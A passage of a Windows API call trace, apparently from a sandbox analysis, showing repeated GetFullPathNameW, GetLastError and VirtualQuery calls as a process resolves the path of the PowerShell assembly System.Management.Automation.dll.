[0145.401] GetLastError () returned 0x0 [0145.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.401] GetLastError () returned 0x0 [0145.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.401] GetLastError () returned 0x0 [0145.401] VirtualQuery (in: lpAddress=0x2dcfd4, lpBuffer=0x2ddfd4, dwLength=0x1c | out: lpBuffer=0x2ddfd4*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.401] VirtualQuery (in: lpAddress=0x2dd010, lpBuffer=0x2de010, dwLength=0x1c | out: lpBuffer=0x2de010*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dd9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.402] GetLastError () returned 0x0 [0145.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dd978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.402] GetLastError () returned 0x0 [0145.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dd978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.402] GetLastError () returned 0x0 [0145.402] VirtualQuery (in: lpAddress=0x2dcfd4, lpBuffer=0x2ddfd4, dwLength=0x1c | out: lpBuffer=0x2ddfd4*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.402] VirtualQuery (in: lpAddress=0x2dd010, lpBuffer=0x2de010, dwLength=0x1c | out: lpBuffer=0x2de010*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dd9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.402] GetLastError () returned 0x0 [0145.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dd978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.402] GetLastError () returned 0x0 [0145.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dd978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.402] GetLastError () returned 0x0 [0145.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.403] GetLastError () returned 0x0 [0145.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.403] GetLastError () returned 0x0 [0145.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.403] GetLastError () returned 0x0 [0145.403] VirtualQuery (in: lpAddress=0x2dcfd4, lpBuffer=0x2ddfd4, dwLength=0x1c | out: lpBuffer=0x2ddfd4*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.403] VirtualQuery (in: lpAddress=0x2dd010, lpBuffer=0x2de010, dwLength=0x1c | out: lpBuffer=0x2de010*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dd9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.403] GetLastError () returned 0x0 [0145.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dd978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.403] GetLastError () returned 0x0 [0145.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dd978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.403] GetLastError () returned 0x0 [0145.404] VirtualQuery (in: lpAddress=0x2dcfd4, lpBuffer=0x2ddfd4, dwLength=0x1c | out: lpBuffer=0x2ddfd4*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.404] VirtualQuery (in: lpAddress=0x2dd010, lpBuffer=0x2de010, dwLength=0x1c | out: lpBuffer=0x2de010*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.404] GetLastError () returned 0x0 [0145.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.404] GetLastError () returned 0x0 [0145.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.404] GetLastError () returned 0x0 [0145.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.404] GetLastError () returned 0x0 [0145.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.405] GetLastError () returned 0x0 [0145.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.405] GetLastError () returned 0x0 [0145.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.405] GetLastError () returned 0x0 [0145.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.405] GetLastError () returned 0x0 [0145.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.405] GetLastError () returned 0x0 [0145.405] VirtualQuery (in: lpAddress=0x2dcfd4, lpBuffer=0x2ddfd4, dwLength=0x1c | out: lpBuffer=0x2ddfd4*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.405] VirtualQuery (in: lpAddress=0x2dd010, lpBuffer=0x2de010, dwLength=0x1c | out: lpBuffer=0x2de010*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dd9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.405] GetLastError () returned 0x0 [0145.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dd978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.405] GetLastError () returned 0x0 [0145.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dd978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.406] GetLastError () returned 0x0 [0145.406] VirtualQuery (in: lpAddress=0x2dcfd4, lpBuffer=0x2ddfd4, dwLength=0x1c | out: lpBuffer=0x2ddfd4*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.406] VirtualQuery (in: lpAddress=0x2dd010, lpBuffer=0x2de010, dwLength=0x1c | out: lpBuffer=0x2de010*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dd9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.406] GetLastError () returned 0x0 [0145.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dd978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.406] GetLastError () returned 0x0 [0145.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dd978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.406] GetLastError () returned 0x0 [0145.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.406] GetLastError () returned 0x0 [0145.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.406] GetLastError () returned 0x0 [0145.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.406] GetLastError () returned 0x0 [0145.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dde90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.406] GetLastError () returned 0x0 [0145.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.407] GetLastError () returned 0x0 [0145.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.407] GetLastError () returned 0x0 [0145.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.407] GetLastError () returned 0x0 [0145.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.407] GetLastError () returned 0x0 [0145.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.407] GetLastError () returned 0x0 [0145.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.407] GetLastError () returned 0x0 [0145.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.407] GetLastError () returned 0x0 [0145.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.407] GetLastError () returned 0x0 [0145.408] VirtualQuery (in: lpAddress=0x2dd444, lpBuffer=0x2de444, dwLength=0x1c | out: lpBuffer=0x2de444*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dde38, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.408] GetLastError () returned 0x0 [0145.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.408] GetLastError () returned 0x0 [0145.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.408] GetLastError () returned 0x0 [0145.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.408] GetLastError () returned 0x0 [0145.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.408] GetLastError () returned 0x0 [0145.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.408] GetLastError () returned 0x0 [0145.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.409] GetLastError () returned 0x0 [0145.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.409] GetLastError () returned 0x0 [0145.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.409] GetLastError () returned 0x0 [0145.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.409] GetLastError () returned 0x0 [0145.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.409] GetLastError () returned 0x0 [0145.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.409] GetLastError () returned 0x0 [0145.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.409] GetLastError () returned 0x0 [0145.409] GetFullPathNameW (in: 